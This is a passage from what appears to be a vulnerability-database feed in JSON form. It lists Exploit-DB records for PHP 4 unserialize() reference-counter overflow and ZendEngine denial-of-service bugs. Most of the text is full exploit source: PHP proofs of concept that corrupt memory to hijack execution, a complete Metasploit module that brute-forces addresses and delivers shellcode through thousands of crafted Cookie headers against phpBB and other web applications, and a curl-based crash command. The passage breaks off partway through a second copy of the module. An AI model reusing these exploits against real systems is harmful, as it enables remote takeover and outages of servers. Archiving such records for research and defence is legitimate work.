Therefore x can be used to modify a\n\n // Overwrite pointer to the destructor \n $_________________x[8*4+0] = chr(0x55);\n $_________________x[8*4+1] = chr(0x66);\n $_________________x[8*4+2] = chr(0x77);\n $_________________x[8*4+3] = chr(0x88);\n \n // Trigger the destruction\n unset($_________________a);\n?>\n\n# milw0rm.com [2007-03-27]\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/3586/"}, {"lastseen": "2016-02-01T11:34:38", "bulletinFamily": "exploit", "description": "PHP < 4.5.0 unserialize Overflow. CVE-2007-1286. Remote exploit for php platform", "modified": "2007-03-01T00:00:00", "published": "2007-03-01T00:00:00", "id": "EDB-ID:9939", "href": "https://www.exploit-db.com/exploits/9939/", "type": "exploitdb", "title": "PHP < 4.5.0 - unserialize Overflow", "sourceData": "##\r\n# $Id$\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to \r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\n\r\nrequire 'msf/core'\r\n\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\r\n\tinclude Msf::Exploit::Remote::Tcp\r\n\tinclude Msf::Exploit::Remote::HttpClient\r\n\tinclude Msf::Exploit::Brute\r\n\t\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\t\r\n\t\t\t'Name' => 'PHP 4 unserialize() ZVAL Reference Counter Overflow (Cookie)',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\tThis module exploits an integer overflow vulnerability in the unserialize()\r\n\t\t\tfunction of the PHP web server extension. This vulnerability was patched by\r\n\t\t\tStefan in version 4.5.0 and applies all previous versions supporting this function.\r\n\t\t\tThis particular module targets numerous web applications and is based on the proof\r\n\t\t\tof concept provided by Stefan Esser. 
This vulnerability requires approximately 900k\r\n\t\t\tof data to trigger due the multiple Cookie headers requirement. Since we\r\n\t\t\tare already assuming a fast network connection, we use a 2Mb block of shellcode for\r\n\t\t\tthe brute force, allowing quick exploitation for those with fast networks. \r\n\t\t\t\r\n\t\t\tOne of the neat things about this vulnerability is that on x86 systems, the EDI register points\r\n\t\t\tinto the beginning of the hashtable string. This can be used with an egghunter to\r\n\t\t\tquickly exploit systems where the location of a valid \"jmp EDI\" or \"call EDI\" instruction\r\n\t\t\tis known. The EDI method is faster, but the bandwidth-intensive brute force used by this\r\n\t\t\tmodule is more reliable across a wider range of systems.\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t},\r\n\t\t\t'Author' => \r\n\t\t\t\t[ \r\n\t\t\t\t\t'hdm', # module development\r\n\t\t\t\t\t'GML <grandmasterlogic [at] gmail.com>', # module development and debugging\r\n\t\t\t\t\t'Stefan Esser <sesser [at] hardened-php.net>' # discovered, patched, exploited\r\n\t\t\t\t], \r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Version' => '$Revision$',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t['CVE', '2007-1286'],\r\n\t\t\t\t\t['OSVDB', '32771'],\r\n\t\t\t\t\t['URL', 'http://www.php-security.org/MOPB/MOPB-04-2007.html'],\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => false,\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 1024,\r\n\t\t\t\t},\r\n\t\t\t'Targets' => \r\n\t\t\t\t[\r\n\t\t\t\t\r\n\t\t\t\t\t#\r\n\t\t\t\t\t# 64-bit SuSE: 0x005c0000\r\n\t\t\t\t\t# Backtrack 2.0: 0xb797a000\r\n\t\t\t\t\t# Gentoo: 0xb6900000\r\n\t\t\t\t\t#\r\n\t\t\t\t\t[ 'Linux x86 Generic', \r\n\t\t\t\t\t\t{\t\t\t\t\t\t\r\n\t\t\t\t\t\t\t'Platform' => 'linux', \r\n\t\t\t\t\t\t\t'Arch' => [ ARCH_X86 ],\r\n\t\t\t\t\t\t\t'Bruteforce' => \r\n\t\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\t\t'Start' => { 'Ret' => 0xb6000400 },\r\n\t\t\t\t\t\t\t\t\t'Stop' => { 'Ret' => 0xbfff0000 },\r\n\t\t\t\t\t\t\t\t\t'Step' 
=> 1024*1024\r\n\t\t\t\t\t\t\t\t}\t\t\t\t\t\t\t\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\t\t\t\t\t\r\n\t\t\t\t\t[ 'Linux x86 phpBB2', \r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'DefaultCookie' => 'phpbb2mysql_data',\r\n\t\t\t\t\t\t\t'DefaultURI' => '/phpBB2/faq.php',\r\n\t\t\t\t\t\t\t'Signature' => /Powered\\s+by.*phpBB/,\t\t\t\t\t\t\t\r\n\t\t\t\t\t\t\t'Platform' => 'linux', \r\n\t\t\t\t\t\t\t'Arch' => [ ARCH_X86 ],\r\n\t\t\t\t\t\t\t'Bruteforce' => \r\n\t\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\t\t'Start' => { 'Ret' => 0xb6000400 },\r\n\t\t\t\t\t\t\t\t\t'Stop' => { 'Ret' => 0xbfff0000 },\r\n\t\t\t\t\t\t\t\t\t'Step' => 1024*1024\r\n\t\t\t\t\t\t\t\t}\t\t\t\t\t\t\t\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t\t[ 'Linux x86 punBB', \r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'DefaultCookie' => 'punbb_cookie',\r\n\t\t\t\t\t\t\t'DefaultURI' => '/index.php',\r\n\t\t\t\t\t\t\t'Signature' => /Powered\\s+by.*PunBB/,\r\n\t\t\t\t\t\t\t'Platform' => 'linux', \r\n\t\t\t\t\t\t\t'Arch' => [ ARCH_X86 ],\r\n\t\t\t\t\t\t\t'Bruteforce' => \r\n\t\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\t\t'Start' => { 'Ret' => 0xb6000400 },\r\n\t\t\t\t\t\t\t\t\t'Stop' => { 'Ret' => 0xbfff0000 },\r\n\t\t\t\t\t\t\t\t\t'Step' => 1024*1024\r\n\t\t\t\t\t\t\t\t}\t\t\t\t\t\t\t\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t\t[ 'Linux x86 WWWThreads', \r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'DefaultCookie' => 'forum_cookie',\r\n\t\t\t\t\t\t\t'DefaultURI' => '/index.php',\r\n\t\t\t\t\t\t\t'Signature' => /Powered\\s+by.*WWWThreads/,\r\n\t\t\t\t\t\t\t'Platform' => 'linux', \r\n\t\t\t\t\t\t\t'Arch' => [ ARCH_X86 ],\r\n\t\t\t\t\t\t\t'Bruteforce' => \r\n\t\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\t\t'Start' => { 'Ret' => 0xb6000400 },\r\n\t\t\t\t\t\t\t\t\t'Stop' => { 'Ret' => 0xbfff0000 },\r\n\t\t\t\t\t\t\t\t\t'Step' => 1024*1024\r\n\t\t\t\t\t\t\t\t}\t\t\t\t\t\t\t\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t\t[ 'Linux x86 Deadman Redirect', \r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'DefaultCookie' => 'authcookie',\r\n\t\t\t\t\t\t\t'DefaultURI' => 
'/dmr/dmr.php',\r\n\t\t\t\t\t\t\t'Signature' => /document\\.f\\.userdata\\.focus/,\r\n\t\t\t\t\t\t\t'Platform' => 'linux', \r\n\t\t\t\t\t\t\t'Arch' => [ ARCH_X86 ],\r\n\t\t\t\t\t\t\t'Bruteforce' => \r\n\t\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\t\t'Start' => { 'Ret' => 0xb6000400 },\r\n\t\t\t\t\t\t\t\t\t'Stop' => { 'Ret' => 0xbfff0000 },\r\n\t\t\t\t\t\t\t\t\t'Step' => 1024*1024\r\n\t\t\t\t\t\t\t\t}\t\t\t\t\t\t\t\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t\t[ 'Linux x86 PhpWebGallery', \r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'DefaultCookie' => 'pwg_remember',\r\n\t\t\t\t\t\t\t'DefaultURI' => '/phpwebgallery/index.php',\r\n\t\t\t\t\t\t\t'Signature' => /Powered\\s+by.*phpwebgallery/msi,\r\n\t\t\t\t\t\t\t'Platform' => 'linux', \r\n\t\t\t\t\t\t\t'Arch' => [ ARCH_X86 ],\r\n\t\t\t\t\t\t\t'Bruteforce' => \r\n\t\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\t\t'Start' => { 'Ret' => 0xb6000400 },\r\n\t\t\t\t\t\t\t\t\t'Stop' => { 'Ret' => 0xbfff0000 },\r\n\t\t\t\t\t\t\t\t\t'Step' => 1024*1024\r\n\t\t\t\t\t\t\t\t}\t\t\t\t\t\t\t\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t\t[ 'Linux x86 Ariadne-CMS', \r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'DefaultCookie' => 'ARCookie',\r\n\t\t\t\t\t\t\t'DefaultURI' => '/ariadne/loader.php/',\r\n\t\t\t\t\t\t\t'Signature' => /Ariadne is free software/,\r\n\t\t\t\t\t\t\t'Platform' => 'linux', \r\n\t\t\t\t\t\t\t'Arch' => [ ARCH_X86 ],\r\n\t\t\t\t\t\t\t'Bruteforce' => \r\n\t\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\t\t'Start' => { 'Ret' => 0xb6000400 },\r\n\t\t\t\t\t\t\t\t\t'Stop' => { 'Ret' => 0xbfff0000 },\r\n\t\t\t\t\t\t\t\t\t'Step' => 1024*1024\r\n\t\t\t\t\t\t\t\t}\t\t\t\t\t\t\t\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t\t[ 'Linux x86 ProMA', \r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'DefaultCookie' => 'proma',\r\n\t\t\t\t\t\t\t'DefaultURI' => '/proma/index.php',\r\n\t\t\t\t\t\t\t'Signature' => /Change Account Information/,\r\n\t\t\t\t\t\t\t'Platform' => 'linux', \r\n\t\t\t\t\t\t\t'Arch' => [ ARCH_X86 ],\r\n\t\t\t\t\t\t\t'Bruteforce' => 
\r\n\t\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\t\t'Start' => { 'Ret' => 0xb6000400 },\r\n\t\t\t\t\t\t\t\t\t'Stop' => { 'Ret' => 0xbfff0000 },\r\n\t\t\t\t\t\t\t\t\t'Step' => 1024*1024\r\n\t\t\t\t\t\t\t\t}\t\t\t\t\t\t\t\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\t\t\t\t\t\t\t\t\t\t\t\t\t\r\n\t\t\t\t\t[ 'Linux x86 eGroupware', \r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'DefaultCookie' => 'eGW_remember',\r\n\t\t\t\t\t\t\t'DefaultURI' => '/egroupware/login.php',\r\n\t\t\t\t\t\t\t'Signature' => /www.egroupware.org/,\r\n\t\t\t\t\t\t\t'Platform' => 'linux', \r\n\t\t\t\t\t\t\t'Arch' => [ ARCH_X86 ],\r\n\t\t\t\t\t\t\t'Bruteforce' => \r\n\t\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\t\t'Start' => { 'Ret' => 0xb6000400 },\r\n\t\t\t\t\t\t\t\t\t'Stop' => { 'Ret' => 0xbfff0000 },\r\n\t\t\t\t\t\t\t\t\t'Step' => 1024*1024\r\n\t\t\t\t\t\t\t\t}\t\t\t\t\t\t\t\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t]\t\t\t\t\t\t\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Mar 04 2007'))\r\n\t\t\t\r\n\t\t\tregister_options(\r\n\t\t\t\t[\r\n\t\t\t\t\tOptString.new('URI', [false, \"The path to vulnerable PHP script\"]),\r\n\t\t\t\t\tOptString.new('COOKIENAME', [false, \"The name of the cookie passed to unserialize()\"])\r\n\t\t\t\t], self.class)\r\n\tend\r\n\r\n\r\n\tdef check\r\n\t\tprint_status(\"Checking for a vulnerable PHP version...\")\r\n\r\n\t\t#\r\n\t\t# Pick the URI and Cookie name\r\n\t\t#\r\n\t\tcookie_name = datastore['COOKIENAME'] || target['DefaultCookie']\r\n\t\turi_path = datastore['URI'] || target['DefaultURI']\r\n\r\n\t\tif(not cookie_name)\r\n\t\t\traise RuntimeError, \"The COOKIENAME option must be set\"\r\n\t\tend\r\n\t\t\r\n\t\tif(not uri_path)\r\n\t\t\traise RuntimeError, \"The URI option must be set\"\r\n\t\tend\r\n\t\t\t\t\r\n\t\tres = send_request_cgi({\r\n\t\t\t'uri'\t\t => uri_path,\r\n\t\t\t'method'\t => 'GET'\r\n\t\t}, 5)\r\n\t\t\r\n\t\tphp_bug = false\r\n\t\t\r\n\t\tif (not res)\r\n\t\t\tprint_status(\"No response from the server\")\r\n\t\t\treturn Exploit::CheckCode::Safe\r\n\t\tend\r\n\t\t\r\n\t\tif (res.code != 
200)\r\n\t\t\tprint_status(\"The server returned #{res.code} #{res.message}\")\r\n\t\t\treturn Exploit::CheckCode::Safe\t\r\n\t\tend\r\n\t\t\r\n\t\tif (\r\n\t\t\t(res.headers['X-Powered-By'] and res.headers['X-Powered-By'] =~ /PHP\\/(.*)/) or\r\n\t\t\t(res.headers['Server'] and res.headers['Server'] =~ /PHP\\/(.*)/)\r\n\t\t )\r\n\t\t \r\n\t\t\tphp_raw = $1\r\n\t\t\tphp_ver = php_raw.split('.')\r\n\r\n\t\t\tif (php_ver[0].to_i == 4 and php_ver[1] and php_ver[2] and php_ver[1].to_i < 5)\r\n\t\t\t\tprint_status(\"The server runs a vulnerable version of PHP (#{php_raw})\")\r\n\t\t\t\tphp_bug = true\r\n\t\t\telse\r\n\t\t\t\tprint_status(\"The server runs a non-vulnerable version of PHP (#{php_raw})\")\r\n\t\t\t\treturn Exploit::CheckCode::Safe\t\r\n\t\t\tend\r\n\t\tend\r\n\t\t\r\n\t\t# Detect the phpBB cookie name\r\n\t\tif (res.headers['Set-Cookie'] and res.headers['Set-Cookie'] =~ /(.*)_(sid|data)=/)\r\n\t\t\tprint_status(\"The server may require a cookie name of '#{$1}_data'\")\r\n\t\tend\r\n\r\n\t\tif(target and target['Signature'])\r\n\t\t\tif (res.body and res.body.match(target['Signature'])) \r\n\t\t\t\tprint_status(\"Detected target #{target.name}\")\r\n\t\t\telse\r\n\t\t\t\tprint_status(\"Did not detect target #{target.name}\")\r\n\t\t\tend\r\n\r\n\t\tend\r\n\r\n\t\treturn php_bug ? 
Exploit::CheckCode::Vulnerable : Exploit::CheckCode::Appears\r\n\tend\r\n\r\n\r\n\tdef brute_exploit(target_addrs)\r\n\t\r\n\t\tzvalref = encode_semis('i:0;R:2;')\r\n\r\n#\r\n# Use this if we decide to do 'jmp edi' returns vs brute force\r\n#\r\n=begin\r\n\t\t# Linux specific egg-hunter\r\n\t\ttagger = \"\\x90\\x50\\x90\\x50\"\r\n\t\thunter = \r\n\t\t\t\"\\xfc\\x66\\x81\\xc9\\xff\\x0f\\x41\\x6a\\x43\\x58\\xcd\\x80\" +\r\n\t\t\t\"\\x3c\\xf2\\x74\\xf1\\xb8\" +\r\n\t\t\ttagger +\r\n\t\t\t\"\\x89\\xcf\\xaf\\x75\\xec\\xaf\\x75\\xe9\\xff\\xe7\"\r\n\r\n\t\tegghunter = \"\\xcc\" * 39\r\n\t\tegghunter[0, hunter.length] = hunter\r\n\t\t\r\n\t\thashtable = \"\\xcc\" * 39\r\n\t\thashtable[0, 2] = \"\\xeb\\xc6\" # jmp back 32 bytes\r\n\t\t\r\n\t\thashtable[20, 4] = [target_addrs['Ret']].pack('V')\r\n\t\thashtable[32, 4] = [target_addrs['Ret']].pack('V')\r\n=end\r\n\r\n\t\t#\r\n\t\t# Just brute-force addresses for now\r\n\t\t# \r\n\t\ttagger = ''\r\n\t\tegghunter = rand_text_alphanumeric(39)\r\n\t\thashtable = rand_text_alphanumeric(39)\r\n\t\thashtable[20, 4] = [target_addrs['Ret']].pack('V')\r\n\t\thashtable[32, 4] = [target_addrs['Ret']].pack('V')\r\n\r\n\r\n\t\t#\r\n\t\t# Pick the URI and Cookie name\r\n\t\t#\r\n\t\tcookie_name = datastore['COOKIENAME'] || target['DefaultCookie']\r\n\t\turi_path = datastore['URI'] || target['DefaultURI']\r\n\r\n\t\tif(not cookie_name)\r\n\t\t\traise RuntimeError, \"The COOKIENAME option must be set\"\r\n\t\tend\r\n\t\t\r\n\t\tif(not uri_path)\r\n\t\t\traise RuntimeError, \"The URI option must be set\"\r\n\t\tend\r\n\t\t\r\n\t\t# Generate and reuse the original buffer to save CPU\r\n\t\tif (not @saved_cookies)\r\n\t\t\r\n\t\t\t# Building the malicious request\r\n\t\t\tprint_status(\"Creating the request...\")\r\n\t\t\t\t\r\n\t\t\t# Create the first cookie header to get this started\r\n\t\t\tcookie_fun = \"Cookie: #{cookie_name}=\"\r\n\t\t\tcookie_fun << Rex::Text.uri_encode(\r\n\t\t\t\t'a:100000:{s:8:\"' + 
\r\n\t\t\t\trand_text_alphanumeric(8) +\r\n\t\t\t\t'\";a:3:{s:12:\"' + \r\n\t\t\t\trand_text_alphanumeric(12) + \r\n\t\t\t\t'\";a:1:{s:12:\"' +\r\n\t\t\t\trand_text_alphanumeric(12) +\r\n\t\t\t\t'\";i:0;}s:12:\"' +\r\n\t\t\t\trand_text_alphanumeric(12) +\r\n\t\t\t\t'\";'+\r\n\t\t\t\t'i:0;s:12:\"' +\r\n\t\t\t\trand_text_alphanumeric(12) +\r\n\t\t\t\t'\";i:0;}'\r\n\t\t\t)\r\n\t\t\tcookie_fun << zvalref * 500\r\n\t\t\tcookie_fun << Rex::Text.uri_encode('s:2:\"')\r\n\t\t\tcookie_fun << \"\\r\\n\"\r\n\r\n\t\t\trefcnt = 1000\r\n\t\t\trefmax = 65535\r\n\r\n\t\t\t# Keep adding cookie headers...\r\n\t\t\twhile(refcnt < refmax) \r\n\r\n\t\t\t\tchead = 'Cookie: ';\r\n\t\t\t\tchead << encode_semis('\";N;')\r\n\r\n\t\t\t\t# Stay within the 8192 byte limit\r\n\t\t\t\t0.upto(679) do |i|\r\n\t\t\t\t\tbreak if refcnt >= refmax\r\n\t\t\t\t\trefcnt += 1\r\n\r\n\t\t\t\t\tchead << zvalref\r\n\t\t\t\tend\r\n\t\t\t\tchead << encode_semis('s:2:\"')\r\n\t\t\t\tcookie_fun << chead + \"\\r\\n\"\r\n\t\t\tend\r\n\r\n\t\t\t# The final header, including the hashtable with return address\r\n\t\t\tcookie_fun << \"Cookie: \"\r\n\t\t\tcookie_fun << Rex::Text.uri_encode('\";N;')\r\n\t\t\tcookie_fun << zvalref * 500\t\r\n\t\t\t\r\n\t\t\t@saved_cookies = cookie_fun\r\n\t\tend\r\n\r\n\t\t# Generate and reuse the payload to save CPU time\r\n\t\tif (not @saved_payload)\r\n\t\t\t@saved_payload = ((tagger + tagger + make_nops(8192) + payload.encoded) * 256)\r\n\t\tend\r\n\t\t\r\n\t\tcookie_addrs = Rex::Text.uri_encode(\r\n\t\t\t's:39:\"' + egghunter + '\";s:39:\"'+ hashtable +'\";i:0;R:3;'\r\n\t\t) + \"\\r\\n\"\r\n\r\n\t\tprint_status(\"Trying address 0x%.8x...\" % target_addrs['Ret'])\r\n\t\tres = send_request_cgi({\r\n\t\t\t'uri'\t\t => uri_path,\r\n\t\t\t'method'\t => 'POST',\r\n\t\t\t'raw_headers' => @saved_cookies + cookie_addrs,\r\n\t\t\t'data' => @saved_payload\r\n\t\t}, 1)\r\n\r\n\t\t\r\n\t\tif res\r\n\t\t\tfailed = false\r\n\t\t\t\r\n\t\t\tprint_status(\"Received a response: #{res.code} 
#{res.message}\")\r\n\r\n\t\t\tif (res.code != 200)\r\n\t\t\t\tprint_status(\"The server returned a non-200 response, indicating that the exploit failed.\")\r\n\t\t\t\tfailed = true\t\t\t\r\n\t\t\tend\r\n\t\t\t\t\t\t\r\n\t\t\tif (not failed and (res.body and res.body.length > 0))\r\n\t\t\t\tprint_status(\"The server returned a real response, indicating that the exploit failed.\")\r\n\t\t\t\tfailed = true\r\n\t\t\tend\r\n\t\t\t\r\n\t\t\tif (failed)\r\n\t\t\t\tprint_status(\"Please verify the URI and COOKIENAME parameters.\")\r\n\t\t\t\tprint_line('')\r\n\t\t\t\tprint_line(\"*\" * 40)\r\n\t\t\t\tprint_line(res.body)\r\n\t\t\t\tprint_line(\"*\" * 40)\r\n\t\t\t\tprint_line('')\r\n\t\t\t\t\t\t\t\t\r\n\t\t\t\traise RuntimeError, \"Exploit settings are probably wrong\"\t\t\t\t\r\n\t\t\tend\r\n\t\telse\r\n\t\t\tprint_status(\"No response from the server\")\r\n\t\tend\r\n\r\n\tend\r\n\r\n\tdef encode_semis(str)\r\n\t\tstr.gsub(';') { |s| sprintf(\"%%%.2x\", s[0]) }\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/9939/"}, {"lastseen": "2016-02-03T10:55:25", "bulletinFamily": "exploit", "description": "PHP 3/4/5 ZendEngine Variable Destruction Remote Denial of Service Vulnerability. CVE-2007-1285. 
Dos exploit for php platform", "modified": "2007-03-01T00:00:00", "published": "2007-03-01T00:00:00", "id": "EDB-ID:29692", "href": "https://www.exploit-db.com/exploits/29692/", "type": "exploitdb", "title": "PHP 3/4/5 ZendEngine Variable Destruction Remote Denial of Service Vulnerability", "sourceData": "source: http://www.securityfocus.com/bid/22764/info\r\n\r\nPHP is prone to a denial-of-service vulnerability because it fails to properly sanitize user-supplied input.\r\n\r\nAn attacker who can run PHP code on a vulnerable computer may exploit this vulnerability to crash PHP and the webserver, denying service to legitimate users.\r\n\r\nThis issue affects all versions of PHP. \r\n\r\n$ php -r 'echo \"a\".str_repeat(\"[]\",200000).\"=1&a=0\";' > postdata\r\n\r\n$ curl http://www.example.com/ -d @postdata\r\n\r\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/29692/"}, {"lastseen": "2016-01-31T18:23:27", "bulletinFamily": "exploit", "description": "PHP <= 4.4.4 unserialize() ZVAL Reference Counter Overflow Exploit PoC. CVE-2007-1286. 
Dos exploit for linux platform", "modified": "2007-03-02T00:00:00", "published": "2007-03-02T00:00:00", "id": "EDB-ID:3396", "href": "https://www.exploit-db.com/exploits/3396/", "type": "exploitdb", "title": "PHP <= 4.4.4 unserialize ZVAL Reference Counter Overflow Exploit PoC", "sourceData": "<?php\n ////////////////////////////////////////////////////////////////////////\n // _ _ _ _ ___ _ _ ___ //\n // | || | __ _ _ _ __| | ___ _ _ ___ __| | ___ | _ \\| || || _ \\ //\n // | __ |/ _` || '_|/ _` |/ -_)| ' \\ / -_)/ _` ||___|| _/| __ || _/ //\n // |_||_|\\__,_||_| \\__,_|\\___||_||_|\\___|\\__,_| |_| |_||_||_| //\n // //\n // Proof of concept code from the Hardened-PHP Project //\n // (C) Copyright 2007 Stefan Esser //\n // //\n ////////////////////////////////////////////////////////////////////////\n // PHP 4 - unserialize() Reference Counter Overflow //\n ////////////////////////////////////////////////////////////////////////\n\n // This is meant as a protection against remote file inclusion.\n die(\"REMOVE THIS LINE\");\n \n // This exploit is only designed for linux x86 systems\n // where 0x08064058 is a readable address in the PHP process \n // (should be unless binary images are relocated default systems)\n // \n // The exploit does nothing useful. It just proves that the CPU\n // will try to execute the instruction at 0x99887766 which results\n // in a crash. Just replace it with a pointer to your shellcode and\n // it will work.\n //\n // To exploit phpBB2 with this you need to put a similar string\n // into the cookie. You must work around the size limit of HTTP\n // headers by using MANY Cookie: headers (not folded lines, real\n // headers). 
Additionally you must put at the end of ever line\n // a line terminator s:2:\" and start every following line with\n // \";N; of course with URL encoded ';'\n\n $hashtable = str_repeat(\"A\", 39);\n \n $hashtable[5*4+0]=chr(0x58);\n $hashtable[5*4+1]=chr(0x40);\n $hashtable[5*4+2]=chr(0x06);\n $hashtable[5*4+3]=chr(0x08);\n \n $hashtable[8*4+0]=chr(0x66);\n $hashtable[8*4+1]=chr(0x77);\n $hashtable[8*4+2]=chr(0x88);\n $hashtable[8*4+3]=chr(0x99);\n\n $str = 'a:100000:{s:8:\"AAAABBBB\";a:3:{s:12:\"0123456789AA\";a:1:{s:12:\"AAAABBBBCCCC\";i:0;}s:12:\"012345678AAA\";i:0;s:12:\"012345678BAN\";i:0;}';\n for ($i=0; $i<65535; $i++) {\n $str .= 'i:0;R:2;';\n }\n $str .= 's:39:\"XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX\";s:39:\"'.$hashtable.'\";i:0;R:3;';\n\n unserialize($str);\n\n?>\n\n# milw0rm.com [2007-03-02]\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/3396/"}, {"lastseen": "2016-02-01T23:34:32", "bulletinFamily": "exploit", "description": "PHP 4 unserialize() ZVAL Reference Counter Overflow (Cookie). CVE-2007-1286. Remote exploits for multiple platform", "modified": "2010-09-20T00:00:00", "published": "2010-09-20T00:00:00", "id": "EDB-ID:16310", "href": "https://www.exploit-db.com/exploits/16310/", "type": "exploitdb", "title": "PHP 4 unserialize ZVAL Reference Counter Overflow Cookie", "sourceData": "##\r\n# $Id: php_unserialize_zval_cookie.rb 10394 2010-09-20 08:06:27Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. 
Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = AverageRanking\r\n\r\n\tinclude Msf::Exploit::Remote::Tcp\r\n\tinclude Msf::Exploit::Remote::HttpClient\r\n\tinclude Msf::Exploit::Brute\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'PHP 4 unserialize() ZVAL Reference Counter Overflow (Cookie)',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits an integer overflow vulnerability in the unserialize()\r\n\t\t\t\tfunction of the PHP web server extension. This vulnerability was patched by\r\n\t\t\t\tStefan in version 4.5.0 and applies all previous versions supporting this function.\r\n\t\t\t\tThis particular module targets numerous web applications and is based on the proof\r\n\t\t\t\tof concept provided by Stefan Esser. This vulnerability requires approximately 900k\r\n\t\t\t\tof data to trigger due the multiple Cookie headers requirement. Since we\r\n\t\t\t\tare already assuming a fast network connection, we use a 2Mb block of shellcode for\r\n\t\t\t\tthe brute force, allowing quick exploitation for those with fast networks.\r\n\r\n\t\t\t\tOne of the neat things about this vulnerability is that on x86 systems, the EDI register points\r\n\t\t\t\tinto the beginning of the hashtable string. This can be used with an egghunter to\r\n\t\t\t\tquickly exploit systems where the location of a valid \"jmp EDI\" or \"call EDI\" instruction\r\n\t\t\t\tis known. 
The EDI method is faster, but the bandwidth-intensive brute force used by this\r\n\t\t\t\tmodule is more reliable across a wider range of systems.\r\n\t\t\t},\r\n\t\t\t'Author' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'hdm', # module development\r\n\t\t\t\t\t'GML <grandmasterlogic [at] gmail.com>', # module development and debugging\r\n\t\t\t\t\t'Stefan Esser <sesser [at] hardened-php.net>' # discovered, patched, exploited\r\n\t\t\t\t],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Version' => '$Revision: 10394 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t['CVE', '2007-1286'],\r\n\t\t\t\t\t['OSVDB', '32771'],\r\n\t\t\t\t\t['URL', 'http://www.php-security.org/MOPB/MOPB-04-2007.html'],\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => false,\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 1024,\r\n\t\t\t\t},\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\r\n\t\t\t\t\t#\r\n\t\t\t\t\t# 64-bit SuSE: 0x005c0000\r\n\t\t\t\t\t# Backtrack 2.0: 0xb797a000\r\n\t\t\t\t\t# Gentoo: 0xb6900000\r\n\t\t\t\t\t#\r\n\t\t\t\t\t[ 'Linux x86 Generic',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Platform' => 'linux',\r\n\t\t\t\t\t\t\t'Arch' => [ ARCH_X86 ],\r\n\t\t\t\t\t\t\t'Bruteforce' =>\r\n\t\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\t\t'Start' => { 'Ret' => 0xb6000400 },\r\n\t\t\t\t\t\t\t\t\t'Stop' => { 'Ret' => 0xbfff0000 },\r\n\t\t\t\t\t\t\t\t\t'Step' => 1024*1024\r\n\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t\t[ 'Linux x86 